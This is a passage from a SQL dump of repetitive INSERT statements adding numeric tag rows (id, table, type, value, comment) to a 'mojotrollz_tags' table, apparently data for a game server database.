`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11796, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11797, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11797, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11798, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11798, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11799, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11799, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11800, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11800, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11801, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11801, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11802, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11802, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11803, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11803, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11804, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11804, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11805, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11805, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11806, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11806, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11807, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11807, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11808, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11808, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11810, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11810, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11811, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11811, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11812, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11812, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11813, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11813, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11814, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11814, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11814, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11815, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11815, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11816, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11816, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11817, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11817, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11818, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11818, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11819, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11819, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11820, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11820, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11821, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11821, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11822, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11822, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11823, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11823, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11824, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11824, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11825, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11825, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11826, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11826, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11827, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11827, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11828, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11828, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11829, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11829, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11830, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11830, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11830, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11831, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11831, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11831, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11832, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11832, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11833, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11833, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11834, 1, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11834, 1, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11834, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11835, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11835, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11835, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11835, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11835, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11836, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11837, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11837, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11837, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11838, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11838, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11838, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11839, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11839, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11839, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11840, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11840, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11840, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11856, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11856, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11857, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11857, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11857, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11857, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11857, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11858, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11858, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11859, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11860, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11860, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11861, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11861, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11862, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11862, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11863, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11863, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11864, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11864, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11865, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11865, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11866, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11866, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11867, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11867, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11868, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11868, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11868, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11868, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11868, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11868, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11869, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11869, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11870, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11870, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11870, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11870, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11870, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11871, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11871, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11871, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11871, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11871, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11871, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11872, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11872, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11873, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11873, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11874, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11874, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11875, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11876, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11877, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11877, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11878, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11878, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11880, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11880, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11881, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11881, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11882, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11882, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11883, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11883, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11884, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11885, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11885, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11886, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11887, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11896, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11896, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11897, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11897, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11898, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11898, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11899, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11899, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11900, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11900, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11901, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11901, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11910, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11910, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11911, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11911, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11912, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11912, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11913, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11913, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11914, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11914, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11915, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11915, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11916, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11916, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11917, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11917, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11918, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11918, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11920, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11921, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11921, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11936, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11936, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11937, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11939, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11939, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11940, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11940, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11941, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11941, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11942, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11942, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11943, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11943, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11943, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11944, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11944, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11945, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11945, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11946, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11946, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11946, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11947, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11947, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11947, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11948, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11948, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11948, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11949, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11949, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11949, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11956, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11956, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11957, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11957, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11979, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11979, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11981, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11981, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11981, 1, 30, 3, 